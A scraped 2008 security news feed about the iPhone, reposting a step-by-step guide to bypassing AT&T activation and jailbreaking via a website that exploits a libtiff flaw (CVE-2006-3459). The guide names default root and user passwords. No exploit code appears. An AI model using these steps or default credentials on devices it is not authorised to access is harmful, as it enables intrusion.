http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2008-11-20 04:17:04 - Hack a Day : The iphone-dev team has officially stated “all that remains isimplementation“ They’ve developed all the pieces they need to performa software unlock for the iPhone 3G, now it’s just a matter of puttingthem together in user friendly fashion They’ve managed to rununsigned code on the baseband, developed custom AT tools, and arehttp://www.secuobs.com/revue/news/37261.shtmlhttp://www.secuobs.com/revue/news/37261.shtml 2008-11-19 03:38:38 - Hack In The Box : With its glassy touch screen, powerful graphics, crisp sound and tiltfeature, the iPhone is more than a smart phone for some users -- it'sa portable entertainment system It's also become a potential goldmine for entrepreneurs who create games for the device Just ask SteveDemeter, developer of the popular puzzle game "Trism" A former ATMsoftware designer for a large bank, Demeter created "Trism" in hisspare time and pitched it to Apple last spring The company made thegame available for download with the July launch of its App Store, anonline provider of applications for its iPods and iPhones Priced at$5, "Trism" earned Demeter $250,000 in profits the first two months"It's done phenomenal business," said Demeter, 29, who lives in theCalifornia's San Francisco Bay area "I'm very honored that so manypeople would enjoy my game I get e-mails from 50-year-old ladies whosay, "I don't play games, but I love Trism' That's the coolestthing"http://www.secuobs.com/revue/news/37031.shtmlhttp://www.secuobs.com/revue/news/37031.shtml 2008-11-19 03:38:38 - Hack In The Box : Of course, after Apple develops an elegant and perfectly understandablemobile UI, Linux hackers want to tear it down Bring on the OpenMoko,Android or Ubuntu Mobile for the iPhone I enjoyed a recent post byPlanetBeing on the Linux on the iPhone blog It was an attempt tojustify why someone would want to spend a tremendous amount of time tobring Linux to the iPhone, when he or she could “just develop on anopen platform instead with no such wasted effort” Good question,dude PlanetBeing says he doesn’t want to buy other less-polishedplatforms just for a hack; he likes the iPhone And the “knowledgethat we are gaining/will have gained about the iPhone hardware will beof incredible practical value to the homebrew iPhone community”http://www.secuobs.com/revue/news/37023.shtmlhttp://www.secuobs.com/revue/news/37023.shtml 2008-11-19 02:14:22 - Hack a Day : Google recently updated their Google Mobile App with a couple newfeatures Voice Search automatically starts listening when you raisethe phone to your ear Just say what you’re looking for, and it willpoll Google and return the results The app leverages Google’s voicerecognition engine, which they’ve been training with Goog-411 AndyBaio http://www.secuobs.com/revue/news/37012.shtmlhttp://www.secuobs.com/revue/news/37012.shtml 2008-11-18 22:32:06 - News : A poster on the Apple Support site is reporting that she found a"raunchy picture" on her husband's iPhone, and that the photo had beensent via Yahoo email to another woman Her husband admitted taking thepicture but claims that he never sent it to anyone And staff expertsat his local Apple store backed him up, saying he'd been a victim ofan iPhone glitchread moreIMAGEhttp://www.secuobs.com/revue/news/36967.shtmlhttp://www.secuobs.com/revue/news/36967.shtml 2008-11-18 19:33:33 - Latest from Computerworld : Google on Monday added voice capabilities to its search application forthe iPhone, allowing iPhone owners to speak search terms into thedevice to perform searchesAdd to digg Add to StumbleUpon Add to Twitter Add to Slashdothttp://www.secuobs.com/revue/news/36926.shtmlhttp://www.secuobs.com/revue/news/36926.shtml 2008-11-18 19:32:19 - SCTeam : iphone_2L'iPhone d’Apple, aurait apparemment une faille étonnanteIl prendrait des photos de vos parties génitales pour les insérer toutseul comme un grand dans un email Susan a bien voulu dévoiler cette faille sur les forums AppleElle dit qu’en farfouillant dans le mobile de son mari, comme toutebonne épouse, a découvert une photo de ses bijoux intimes attachée àun email envoyé à une autre femmeElle a évidemment accusé l’indélicat de le tromperL’excuse du Fanboy a été qu’il a bien pris la photo mais qu’il ne l’ajamais envoyée à qui que ce soitIl s’est tellement inquiété que son Iphone décidait d’envoyer desemails sans permission qu’il serait allé sur le forum bien nommé AppleGenius BarIl jure qu’un porte-Appple lui a assuré que c’était un défaut connu del’Iphone Parfois des photos s’attachent toutes seules dans un email,même si l’email n’est pas envoyéSusan a cherché à savoir si c’était effectivement possible, le futurde leur mariage en dépendantSur le forum, les fanboys d’Apple lui assurent qu’il la trompeL’Iphone est parfait et n’a aucun problème Quiconque dit le contraireest de toute évidence un gros menteurLeur conseil est de le quitter et l’un d’entre eux aimerait voir laphotoSource: theinquirerfrhttp://www.secuobs.com/revue/news/36920.shtmlhttp://www.secuobs.com/revue/news/36920.shtml 2008-11-18 15:40:24 - MNIN Security Blog : Well, not really, but that's how I justify it As an existingCingular/ATT customer with a Samsung Blackjack, I've been paying$60/month for unlimited data and unlimited text messages The iPhoneplan with unlimited data and 1500 texts is only $30/month Based onthe assumption that there will never be a month when I send more than50 texts per day on average, I'll end up saving $30/month if I buy aniPhone and drop the $60 plan The $430 8GB purchase will practicallypay for itself within the first 14 monthsThanks for overcharging me for so long, CingularUpdate: This is the biggest piece of shit phone I've ever seen For a10% restocking fee, I'm more than glad to return it first thingtomorrow morning It doesn't support MMS What the fuck kind ofmultimedia phone doesn't support MMS It doesn't take videos and thecamera is so lame, it doesn't have a single feature besides "takepicture" Three of the four times I tried to sync music, it hung andejected itself from iTunes And devices with non-removable batteriesthat drain quick are just no use to people who don't stand next topower outlets all dayhttp://www.secuobs.com/revue/news/36824.shtmlhttp://www.secuobs.com/revue/news/36824.shtml 2008-11-18 13:22:14 - Global Security Mag Online : Intrepid iPhone developers bypass security for functionalityDate : 18 Novembre 2008Plateforme : Mac OS XProgramme : iPhoneExploitation : Avec un fichier malicieuxDommage : Accès au systèmeDescription :Un nouveau problème affectant les applications développées pourl'Iphone vient d'être révélé En effet, depuis plusieurs mois Appleoffre la possibilité aux développeurs de créer leurs propresapplications puis de les vendre via le portail AppleStore N'importequel internaute peut donc - Vulnérabilitéshttp://www.secuobs.com/revue/news/36778.shtmlhttp://www.secuobs.com/revue/news/36778.shtml 2008-11-18 08:16:53 - ZATAZ News : Les amateurs du déblocage de l´iPhone 3G s´inquiétent de la prochainemise à jour du téléphone portable d´Applehttp://www.secuobs.com/revue/news/36727.shtmlhttp://www.secuobs.com/revue/news/36727.shtml 2008-11-17 19:34:39 - SCTeam : iphone_hackedLes amateurs de l’iPhone connaissent les aventures desbidouilleurs de chez l’iPhone Dev Team iDT Mission de ces joyeuxlurons du bit, trouver toutes les parades pour débloquer, désimlocker,le téléphone portable d’AppleSeulement, il semble que la grosse pomme va mettre en place le moyend’extirper le ver iDT de son iPhoneLa mise à jour de l’iPhone 3G, la V 22, est annoncée par l’iDT etelle inquiéte les bidouilleurs “Cette mise à jour sera libéréeprochainement, indique le Dev Team, Ne l’installez pas aveuglement oualors ne venez pas vous plaindre ensuite“Depuis la sortie de l’iPhone 3G, le Dev Team parle de la prochainemise en place d’une méthode de désimlockage de l’iPhone 3G Et Apple abien l’intention de contrer cette fumeuse idéeEn juillet dernier la Dev Team avait diffusé un logiciel du nom dePwnage Tool 201 permettant d’installer une mise à jour quelque peumodifiée afin de “jailbreaker” l’appareil Une modification afind’installer et d’exécuter n’importe quel programme, signé ou non, parAppleSource: theinquirerfrhttp://www.secuobs.com/revue/news/36513.shtmlhttp://www.secuobs.com/revue/news/36513.shtml 2008-11-17 02:32:30 - Hack In The Box : Ripoff merchants iUnlock-iPhone have put out a press release celebrating“groundbreaking 3G capabilities” and raising hopes of a trueiPhone 3G unlock, but a quick perusal of its press release and websiteshows it’s all just a scam to pilfer US $2495 out of your pocketand steer you away from the iPhone Dev Team’s free software In thisrelease, dated the 13th of November, iUnlock-iPhone trumpts that ishas made “groundbreaking developments in its iPhone unlockingsoftware, which will allow owners of 3G iPhones to enjoy similarfreedoms as those with older models” Now, you might think that thismeans a true iPhone 3G unlock has been found, trumping the hardworkinghackers over at the iPhone Dev Team with a world first But no,instead we find creative claims that could otherwise be known as lies– depending on your point of viewhttp://www.secuobs.com/revue/news/36386.shtmlhttp://www.secuobs.com/revue/news/36386.shtml 2008-11-15 14:54:22 - McAfee Avert Labs : The Apple iPhone is vulnerable to a new bug related to the signing ofiPhone applications Applications that are created with the officialiPhone SDK need to be cryptographically signed by the author and Applebefore they’re allowed into the App store or installed on an iPhoneThe digital signing is a security measure that http://www.secuobs.com/revue/news/36180.shtmlhttp://www.secuobs.com/revue/news/36180.shtml 2008-11-15 13:02:37 - Toutes les actualités : Le logiciel LogMeIn Ignition permet de contrôler son PC ou son Mac depuis un simple iPhone ou iPod Touch La souris et le clavier sont pris en charge IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/36169.shtmlhttp://www.secuobs.com/revue/news/36169.shtml 2008-11-13 21:19:57 - Latest from Computerworld : Microsoft's upcoming Office Web -- a lightweight version of its Officesuite that runs as an online service -- will be available to Mac OS Xand Linux users, as well as to those using Apple's iPhoneAdd to digg Add to StumbleUpon Add to Twitter Add to Slashdothttp://www.secuobs.com/revue/news/35861.shtmlhttp://www.secuobs.com/revue/news/35861.shtml 2008-11-13 19:23:55 - ArsTechnica Security Content : Ars investigates the recent iPhone "Defaultpng" controversy andconcludes that there's little to worry aboutRead MoreIMAGEIMAGEhttp://www.secuobs.com/revue/news/35850.shtmlhttp://www.secuobs.com/revue/news/35850.shtml 2008-11-13 10:56:59 - Rootsecure.net : c|net: Web-based Office to work on Macs, iPhonehttp://www.secuobs.com/revue/news/35733.shtmlhttp://www.secuobs.com/revue/news/35733.shtml 2008-11-13 02:30:23 - Hack In The Box : According to the consistently reliable iPhone Hellas, the iPhone OS 22update will appear even sooner than we all expected Barring anysudden plan changes, the iPhone Hellas people are saying the upgradewill be available on November 21 The new feature list remainsunchanged from the previous beta versions, so the question here is:Would they add copy and paste by surprise Like always, the jury isstill out on any last-minute surprises Since there were a few majoradditions to iPhone OS 22 beta 2 that weren't in beta 1—like thewalking directions, public transit route information, the applicationscoring, and the direct podcast downloading over the air—we may findmore things in a third beta However, with just 10 days until the 21,this seems unlikely unless there are small changeshttp://www.secuobs.com/revue/news/35682.shtmlhttp://www.secuobs.com/revue/news/35682.shtml 2008-11-12 09:09:09 - Rootsecure.net : Heise Security: iPhone to add wireless modem featurehttp://www.secuobs.com/revue/news/35430.shtmlhttp://www.secuobs.com/revue/news/35430.shtml 2008-11-11 22:30:10 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/35331.shtmlhttp://www.secuobs.com/revue/news/35331.shtml 2008-11-11 15:16:42 - Latest from Computerworld : Apple's iPhone surpassed the Motorola RAZR as the leading handsetpurchased by US-based adults in the third-quarter, according to anew study by market research firm The NPD GroupAdd to digg Add to StumbleUpon Add to Twitter Add to Slashdothttp://www.secuobs.com/revue/news/35232.shtmlhttp://www.secuobs.com/revue/news/35232.shtml 2008-11-11 03:33:53 - Hack In The Box : Surely one of the most irritating ways to waste energy and time issitting in heavy traffic with the engine idling Is there anytechnology on the horizon to eliminate or mitigate traffic jams Antsand iPhones may lead the way Research by collective intelligenceexpert Dr Dirk Helbing of the Dresden University of Technology inGermany indicates that ants and their rough–and-ready methods ofcommunication may be ahead of us in smoothening traffic congestion bycommunication and feedback of optimal routes “Dr Helbing’steam set up an "ant motorway" with two routes of different widths fromthe nest to some sugar syrup Soon the narrower route soon becamecongested But when an ant returning along the congested route to thenest collided with another ant just starting out, the returning antpushed the newcomer onto the other pathhttp://www.secuobs.com/revue/news/35156.shtmlhttp://www.secuobs.com/revue/news/35156.shtml 2008-11-11 03:33:53 - Hack In The Box : Apple's 3G iPhone will soon gain a feature that it currently lackscompared to most other 3G smartphones – the ability to act as amodem for the computer it's attached to At the Web 20 summit in SanFrancisco, ATetT CEO Ralph de la Vega said that a firmware update wouldsoon be available to allow "tethering" – in other words, for thephone to make its data connection available to a PC or Mac Generally,notebook owners use this for getting a fast data connection when outof reach of Wi-Fi Although this is possible with many 3G phones, suchas Nokia's E-series devices, Apple has up to now blocked this featureThird-party applications are out there to achieve this, but Appleblocks their distribution For iPhone owners who have "jail-broken"their device, so that unsigned programs can be installed, there isiSoft's iModem Jailbreaking is quite straightforward, but Apple'ssoftware updates often reverse the process, rendering apps uselessuntil the hackers find a way around the latest restrictionshttp://www.secuobs.com/revue/news/35153.shtmlhttp://www.secuobs.com/revue/news/35153.shtml 2008-11-09 15:17:38 - nzight : A nice write-up on the iPhone has been posted in Metasploit's blogMy favorite pointEvery process runs as root MobileSafari, MobileMail, even theCalculator, all run with full root privileges Any security flawin any iPhone application can lead to a complete systemcompromise A rootkit takes on a whole new meaning when theattacker has access to the camera, microphone, contact list, andphone hardware Couple this with "always-on" internet access overEDGE and you have a perfect spying devicehttp://www.secuobs.com/revue/news/34556.shtmlhttp://www.secuobs.com/revue/news/34556.shtml 2008-11-09 15:17:38 - nzight : He's wrote more on hacking the iPhone on Metasplot's blog Definitelyworth a read I'm dying to read part twohttp://www.secuobs.com/revue/news/34555.shtmlhttp://www.secuobs.com/revue/news/34555.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : Disclaimer: Use of any information available on this and future relatedposts is at your own risk, you are 100% responsible for what you do ordon't do with it, including any Apple's copyright violation orinfringement For an applicable detailed disclaimer about iPhonehacking, please check this All the information published in thisseries of posts has been provided by my friend Esteban J, also knownas Steve JThis series of posts is about how to activate the iPhone version 112OTB Out of The Box without requiring a 2-year ATetT serviceagreement It also provides an update of the current iPhone hackingscene on January 1st, 2008, plus a detailed step-by-step guide tocomplete the iPhone activation and jailbreak processMy friend Esteban got an iPhone recently, and because he lives outsidethe US, he cannot or don't want to use the associated ATetT serviceand rate plans By default, if you do not activate an ATetT account,the iPhone is just a brick, or iBrick : The first step required afterunpacking the device is to connect it to your laptop, and follow theApple/ATetT iPhone activation process using iTunes If you do notprovide your contact details including credit card info, and get ormigrate to an ATetT contract, you cannot activate the iPhone andaccess any of its functionalityThe iPhone is a pretty impressive small device running OS XBasically, it's like an iPod Touch iPod + WiFi with GSM/EDGE +Bluetooth 20 capabilities, plus a 20 megapixels camera; anall-in-one device, where the main drawbacks are the lack of a built-inGPS and 3G support a very common technology in mobile networks allover Europe Apart from the technical specs, the main differentiatoris the user interface the "Touch": This and future related posts try to provide a simplified guide tohack the last version of the iPhone, and try to summarize and clarifythe huge amount of information available out there related with thetopic, specially given the differences between the various iPhoneversions, mainly 102, 111 et 112 It's not cutting-edgeinformation, as there are tons of iPhone hacking resources, such asthe Hackint0sh Forums, iPhone unlock, hackthatphone, iphone-hacks,modmyifone or winandmaccom It just pretends to be an easy to followguide, informative update, all seasoned with some home-made technicalsecurity research What makes iPhone hacking pretty interesting, isthat the main hack is just based on executing code inside the deviceafter exploiting a well-known vulnerability in one of its components,the Safari web browserMy friend's end goal is to be able to activate a US iPhone in Europe,including all its capabilities At the end of December, this is theiPhone hacking state-of-the-art:* The current and latest iPhone version factory, or OTB is 112* The associated modem firmware version is 040213_G* If the device serial number starts with XX745 or above, itmeans it has been released on week 45 or above, and the bootloaderversion is 46This device commonly referred as 112 OTB is the one currentlyavailable on stores and presents strong hacking limitations at thispoint in time The end-result of this guide will be an unlocked orfree iPhone, without phone capabilities, that is, something like aniPod Touch, plus Bluetooth and camera The reason is that the currentbootloader has not been hacked through software yet although severalsmart people are actively working on it The previous bootloaderversion, 39, was hacked and allows you to take advantage of the phonecapabilities using a SIM from any telecom mobile operatorUnfortunately, the hack doesn't work yet with the 46 bootloaderAt this point, the only option to get a fully working 112 OTB iPhoneis to follow this or a similar guide, plus getting a hardware-basedhacking SIM, such as TurboSIM around $40 Although there are orwere multiple iPhone activation methods without an ATetT account, theone presented in this guide or series of posts is the easier one andit works with the current iPhone versionBefore starting with the detailed process, let's clarify a few terms:* Downgrade is the process that involves going from a major firmwareversion to a minor version, such as from the current default 112version to 111 Upgrade is just the opposite* Activation is the process required to enable the iPhone, in thisguide, bypassing the standard ATetT activation to get access toalmost all the functions in the iPhone* Jailbreak is the process that provides you the ability to installthird party applications on the iPhone* Unlock is typically used to refer to the process required tounlock or free the iPhone's SIM module, so that the iPhone can beused with any SIM card instead of the ATetT default SIMAt this point, you are ready to jump to the first step of thestep-by-step guide to activate and jailbreak an iPhone's 112 OTBOn a personal note, and not being a lawyer, Apple is clearly fightinghard to keep its exclusiveness and prestige, although I think thatonce you pay for the device in an Apple Store, the device belongs toyou, that is, you're the owner so, you can play with itSome Apple iPhone facts:* It seems that about a month ago, Apple limited the number of unitsthat can be acquired in the US per person, from 5 to 2* Esteban couldn't pay the iPhone by cash He needed to use a creditcard so that Apple can track the number of units he buys seeprevious bullet* Recently end of 2007 the iPhone has officially reached someEuropean countries, like UK, Germany or France* Esteban didn't sign up any contract when he bought the iPhone,although he religiously paid its price in an Apple Retail Store* Esteban was not notified during the buying process about all thedetails of the iPhone and ATetT service agreement, and theconstraints not only for the phone capabilities, but for thedevice as a whole* Esteban was allowed to buy the iPhone although he does not live inthe US, as his credit card and passport reflected during thepayment process* Finally, iPhone version 113 is going to be released soon, and asusual, it seems it will affect the current activation,jailbreaking and unlocking hacksIt seems we do not learn from the past The best offer is thatcombining a great product and a brilliant commercial strategyDemanding customers today ask for flexible, open, customizable, and"hackable" products, and if you do not believe me, ask Microsoft orLinksys/Cisco In my modest opinion, if Apple wants to attract apopulation other than Apple's staunch admirers, they should reconsiderthe iPhone go-to-market strategy On the other hand, if they want toavoid this type of hacks, they could simply not sell the devicewithout an associated service contract, as it is the case in Europefor several cell phones unless you pay more for the device--¡Happy New Year 2008 to all our readershttp://www.secuobs.com/revue/news/34472.shtmlhttp://www.secuobs.com/revue/news/34472.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : The initial preparation step STEP 1 in order to get a free and usableiPhone 112 OTB Out of The Box requires to obtain all the softwareneeded to activate and jailbreak the iPhone This guide is based onthe following components and versions:* Computer OS: Windows XP SP2* iTunes v75020* iPhone firmware version 112 OTB - Serial number: XXX47bootloader v46* iPhone modem firmware version: 040213_G aka basebandThe iPhone firmware version can be easily determined by looking at thedefault, unactivated, iPhone screen If it shows a globe left image,it is version 111 or lower; if it shows a music CD and cable rightimage, it is version 112Images obtained from wwwhackthatphonecomHow to check the iPhone modem firmware version:1- Turn on your iPhone2- The default screen shows the "slide for emergency" button at thebottom3- Slide and you will get the "Emergency Call" screen plus the phonekeypad4- Type the *3001#12345#* number and press the "Call" button5- You will get the "Field Test" window6- Select the "Versions" menu option7- You will get information about your firmware find the typo :,such as:Firware version: 040213_GLCD Panel ID: This output corresponds to version 112 The previous iPhone version,111, shows 040113_G 01 instead of 02 as the modem firmwareversion A complete list of iPhone versions and the correspondingmodem firmware versions is available hereOnce the details of the required elements have been verified, you needto download three files:* iPhone v111 firmware image iPhone1,1_111_3A109a_Restoreipswfrom Apple or mirrors* iBrickr v091 ibrickr_v091zip from natetrue* Jailbreak v112 112-jailbreakzip from Conceited SoftwareAfter downloading these files, verify their integrity using any MD5tool, like md5deep:C:md5deep iPhone1,1_111_3A109a_Restoreipswd6508e86d588a76547b9cae52d38e325 C:iPhone1,1_111_3A109a_RestoreipswC:md5deep ibrickr_v091zipcff8165f71f74af3f5ad75250fd21d31 C:ibrickr_v091zipC:md5deep 112-jailbreakzipeaef139f3a14ee9aabc7dc445741ca31 C:112-jailbreakzipAt this point, you are ready to jump to STEP 2 and downgrade theiPhone's firmware version from 112 to 111http://www.secuobs.com/revue/news/34471.shtmlhttp://www.secuobs.com/revue/news/34471.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : This next step STEP 2 requires to downgrade the iPhone from version112 to 111 Why we need to follow this process Because in STEP 3,we will take advantage of a vulnerability in the 111 version of theiPhone and run code inside the deviceFrom now onward, I'll start adding some security-related comments forthe infosec readers, marked with *NOTE: Internet connectivity is required on the computer running iTunesin order to start the activation process1- Connect your iPhone via USB to your computer iTunes starts,connects to the Internet, and displays the default activation screenthe one this guide tries to bypassAll iTunes screenshots are based on the Spanish version, the one usedby Esteban* During the activation process, iTunes resolves "phobosapplecom"and establishes an HTTP session asking for "/bagxmlix=2" It isredirected to "http://axphobosapplecomedgesuitenet", and asks for"WebObjects/MZStorewoa/wa/initiateSessionix=2" and multiple relatedresources It is amazing to see the amount of Apple proprietary HTTPheaders used in the exchanges BTW, the iTunes 75 HTTP User-Agent onWindows is:User-Agent: iTunes/75 Windows; U; Microsoft Windows XP ProfessionalService Pack 2 Build 2600 DPI/96Finally, iTunes resolves and establishes an HTTPS connection against"albertapplecom", the real activation server; it also uses HTTPagainst the same server to retrieve multiple images *2- Click the Home button the main and only button on the screen andthe Sleep/Wake button on the top right corner of the device on theiPhone simultaneously and keep pressing them until iTunes detects andshows a message to indicate that the iPhone is in recovery mode Youneed to press both buttons around 10-30 secondsThe iPhone restarts during the process, it gets disconnected fromWindows you can hear the typical Windows USB disconnect device soundand is reconnected back again3- Dismiss the warning message in iTunes by pressing the "OK" buttonYou are presented with two options: "Check for Update" and "Restore"Press the Shift key in Windows and then click on the "Recover" buttonin iTunes The Shift key is required because if it is not used, thenthe restore operation will restore the iPhone to the default factorysetting and the latest firmware version 112, instead of allowingyou to select a new firmware fileA window to browse for files will open Select the iPhone 111firmware file you should have downloaded on STEP 1 and press the"Open" button iTunes will downgrade your iPhone, a process that takesaround 5 minutes The downgrade process will end up with a 1013 or1015 error message see image4- Press the "OK" button to confirm the error message You arereturned back to the restore warning message Press the "OK" button toconfirm this message too5- In order to get out of the "after the downgrade/restore" state, youneed the iBrickr tool for Windows you downloaded on STEP 1 Uncompressthe ZIP file and run the tool ibrickrexe6- Chose the "Boot the phone" option to reboot the iPhone and get outof the recovery modeDuring the process the iPhone background turns red, that's the goodcolor here :, as explained in the iBrick "Attempting to fix"windowOnce the iPhone has restarted, it will run iPhone firmware version111 and you will get the old "Activate iPhone" screen on the iPhone,that is, a globe image iTunes will show the ATetT activation screenagain, and you can close the iBrickr toolAt this point, you have downgraded the iPhone from version 112 to111, and you are ready to jump to STEP 3 in order to jailbreak thedevicehttp://www.secuobs.com/revue/news/34470.shtmlhttp://www.secuobs.com/revue/news/34470.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : In STEP 3 the goal is to jailbreak the iPhone, that is, take control ofthe device in order to be able to activate it and run third-partyapplications We are going to use Safari on an unactivated iPhone, andbrowse to a specific Web site that is going to exploit a vulnerabilityin the device and execute the code required to "free" the devicePrerequisites:* Wireless 80211b/g Internet connectivity is required for theiPhone in order to activate and perform an initial jailbreak onthe device* iTunes is not required in this step You can leave the iPhoneplugged in to the USB port and iTunes running* The default ATetT SIM card provided with the iPhone must beinserted in the phone1- Go to the iPhone activation screen that shows "slide for emergency"at the bottom and slide to get the "Emergency Call" window plus thephone keypad Dial *#307# and press the "Call" button2- The iPhone will start ringing While it rings, erase *#307# byusing the back button on the top of your iPhone screen Type 0 andpress the "Call" button The iPhone will start ringing again Thistime you must press "Answer" green button and then press the "Hold"button The iPhone will start ringing again This last time press"Decline" red button You now get access to the menu showing optionsfor the favorites, contacts, etcYou need to perform the next step "quickly", not to get locked out ofthe screen, as the default iPhone lockout timeout is one minute Ifyou are idle more than one minute and get locked out, follow thisquick sequence of steps:* Thereafter, every time you want to get to the same screen, youneed to push the iPhone Home button, just slide the "slide foremergency" button, then press 0, press Call, press Answer, pressHold, and press Decline3- From the keypad screen, select "Contacts" and add a new contactthrough the + symbol:* Then select "First Last", add "Testing" as the contact name, andselect Save* Select "Add URL", type "prefs://1F", and select Save* Select "Add URL" again, type "http://jailbreakmecom", and selectSaveWhen this is done, select "Save" again to store the new contact andthe iPhone will take you to the contact "Info" page, displaying thename "Testing" and the two URLs you just added4- Select the "prefs://1F" URL and it will open the iPhone "Settings"page Select "General" and the "Auto-Lock" option Set the value to"Never", so that the iPhone screen doesn't get locked for the nextsteps if you are more than one minute reading this guide :5- Go back to the "Settings" screen From there, select "WiFi" and addor choose your wireless network and make sure you are connected to ityou shouldn't get an error connection message6- Now, hit the Home button on the iPhone to go back to the activationscreen, slide and dial the number 0 The iPhone will now ring again,press Answer, press Hold, and press Decline; just like before7- Now, select "Contacts" again and then the "Testing" contact addedpreviously, this time go to the "jailbreakmecom" URL second one Atthe time of the testing, the domain is associated to IP addresses9112118102 and 2087587234 Safari will open and load the pageWhen the page loads, scroll down and click on "Install AppSnapp"Safari will now close and the iPhone returns back to the activationscreen It takes about one minute for the application to getinstalled Be patient At this point, the iPhone will restart Onceyou get to the activation screen again, slide to access the dialkeypad When you do this, the iPhone will restart again Once theiPhone comes back, you can slide to get access to all the iPhonefunctions/icons for the first time At this point you are activatedand jailbroken* Remember that in STEP 2 we downgraded the iPhone to version 111The "jailbreakmecom" Web site takes advantage of a vulnerability inthe version of the libtiff library contained on iPhone version 111through the MobileSafari browser Exploiting this vulnerability it iscapable of running code inside the device see CVE-2006-3459 and theoriginal exploit, plus source codeThe exploit inside the "/files/ytiff" file at "jailbreakmecom" opensthe iPhone for full disk access and installs the AppSnapp Installerfor iPhone 111, called Installerapp, by Nullriver Software At thetime of this writing it installs version 30b4 In fact, the TIFF fileopens the door for other files from "/files" that are downloaded tothe iPhone to perform the hack, such as "payload2bin", "rootzip", or"youtubezip" You can even build your own "jailbreakme" server forums*The AppSnapp Installer is a software package management tool thatallows you to add/install any third-party application into the iPhoneIt includes an "Installer" icon on the main iPhone screen for easyaccess to the software community repositories Additionally, duringthe hack process the TIFF image-rendering library vulnerability isfixed you're now more secure : , and YouTube is fixed tooBTW, this jailbreaking process also works on the iPod Touch Whenwriting this portion of the guide I found a video covering exactlythis step The specific set of actions is slightly different but givesyou an idea of how it should look likeSome of the alleged reasons argued by Apple not to allow third-partyapplications are the potential loss of quality and instability on thedevice, as well as the security risk of getting malware I agree that"untrusted" and external code can cause this issues, but users demandflexibility at the cost of it Anyway, this is changing with thecurrently available WebApps and resources for developers, plus theupcoming native application development kits Feb'08At this point, you have jailbroken and activated the iPhone, version111, and you are ready to jump to the last step, STEP 4, in order toupgrade to version 112 and re-activate the iPhonehttp://www.secuobs.com/revue/news/34469.shtmlhttp://www.secuobs.com/revue/news/34469.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : The last step, STEP 4, is focused on upgrading the iPhone to version112, and re-activating and jailbreaking the device again on the newversionOnce the iPhone restarts from the 111 jailbreak on the previousstep, STEP 3, by default it will reconnect to the previously selectedwireless network if it is still available This connection is requiredto access the software repositories and install new tools1- Click on the "Installer" icon on the iPhone the last blue icon onthe main iPhone screen, aka the Springboard The "Welcome Installer3" screen will show up2- iTunes is required to upgrade the iPhone, so the iPhone must bestill connected to the USB port During the whole process iTunes canbe running on your computer At this point, iTunes will detect a newactivated iPhone and will ask you for the device name, syncinformation, etc Select a name for the iPhone and uncheck the autosynchronization checkbox Click on "Exit"3- Select the name of the iPhone in the left column of iTunes iTuneswill show the default screen, including the "Check for Update" and"Restore" buttons4- On the iPhone select the "Installer" icon The AppSnapp tool willconnect to the Internet and access and refresh the current softwaresource repositoriesNOTE: If you access the "Installer" and it asks you to update itself,please, do so The current version at the time of this writing is30b85- Select the Install icon + symbol and go to the "Tweaks 111"category Select "OktoPrep" and click the "Install" button on thetop-right corner of the iPhoneNOTE: There are current reports Feb'08, where Oktoprep is notavailable anymore See comments below from other readers* This step installs OktoPrep 10, a tool that prepares 111iPhones for TouchFree jailbreak It runs the steps it modifies filesunaltered by the 112 firmware required to be able to run theWindows-based TouchFree jailbreaking tool after upgrading the iPhoneto version 112 Therefore, OktoPrep must be installed and run oniPhone 111, and TouchFree aka Jailbreak must be run on Windowsafter upgrading the iPhone to version 112BTW, in the "Tweaks 111" packages section you can also find thetool that fixes the TIFF vulnerability Other useful software packagesare available here *6- Once OktoPrep is installed, it will show a message on the iPhonesaying "You are now ready to perform an "Update" to 112 and continuewith the TouchFree process" Press the OK button7- Press the Home button on the iPhone to exit the Installer and goback to the main iPhone screen "slide to unlock"8- At this point, go to iTunes and select "Check for Update" iTuneswill find, download and install a new update, and will upgrade theiPhone to firmware version 112 This time you won't get an errormessage like when you downgraded to 111 in STEP 2-- UPDATE for iPhone 113 --Disclaimer: I got the confirmation that this new 113 section worksThanks MateoDuring January 2008 Apple has released the 113 version, therefore,you do not have direct access from iTunes to the 112 firmware but tothe latest 113 version DO *NOT* UPDATE TO 113In order to update your iPhone from 111 to 112 you need to followa similar process as the one we used in STEP 2 for the downgradeFirst of all, download the iPhone 112 firmware file The MD5 valuefor this file is "8337fa372a6a629d38856f3ed40beeff" Press the Shiftkey in Windows and then click on the "Check for Update" button iniTunes The Shift key is required to be able to select a firmware fileif you use the "Recover" button it will undo the actions from theprevious step, removing OktoPrep, as it restores the default factoryfirmwareA window to browse for files will open Select the recently downloadediPhone 112 firmware file and press the "Open" button iTunes willupgrade your iPhone to 112NOTE: The files associated to the firmware updates performed throughiTunes are stored at "C:Documents and SettingsUSERApplicationDataApple ComputeriTunesiPhone Software Updates"-- UPDATE for iPhone 113 --The update process will take a few minutes 15-20 minutes depending onyour Internet connection, as iTunes needs to download the 112firmware version During the process the iPhone will reboot a coupleof times After the new 112 version is downloaded and installed byiTunes inside the iPhone, the iPhone will show the new picture on thedefault iPhone screen see STEP 1 iTunes will show again the defaultATetT activation screen9- Close iTunes and unzip the previously downloaded STEP 1 Jailbreak112 tool, 112-jailbreakzip Inside the tool folder you will finda file called "windowsbat"10- Run "windowsbat", that is, the TouchFree or Jailbreak Windowstool to jailbreak the iPhone 112 version You are presented with thewelcome screenJailbreak is a Java based tool Who said that Java could not be usedfor real-world hacking that only C or C++ can ;11- I suggest you to select the "Install SSH"checkbox, so that you canget access to the iPhone through SSH for future advanced tasksPlease, change the tool default root password by selecting acustomized, long and robust root password Click the "Jailbreak"button and the jailbreak process for the iPhone 112 will startThe "alpine" password suggested by the tool is the one associated bydefault to the root iPhone user in 111 and 112 not in 102 Thedefault "mobile" user password is "dottie" The jailbreak processtakes around 2-5 minutes and at the end, the iPhone reboots and youwill get the following message:After that, the device reboots a couple of times, please be patient,and finally you will get the default iPhone screen with the "slide tounlock" page At this point, you can click OK on the last jailbreakmessage iTunes detects the iPhone, starts, and shows the new updatedversion, 112At this point, you have an almost fully functional 112 iPhone It 